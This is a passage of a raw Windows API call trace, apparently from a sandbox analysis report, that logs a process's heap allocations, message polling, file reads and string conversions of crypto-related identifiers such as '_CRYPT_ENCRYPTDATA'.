wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.181] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.181] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xe765, lpOverlapped=0x0) returned 1 [0042.184] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe765) returned 0xac2018 [0042.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe765) returned 0xad0788 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.186] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe765) returned 0xac2018 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.186] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.187] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.187] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe765) returned 0xac2018 [0042.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0042.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0042.188] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe765) returned 0x935008 [0042.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.190] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.190] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0042.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.191] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.191] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.192] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0042.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.193] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0042.193] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.194] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.194] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 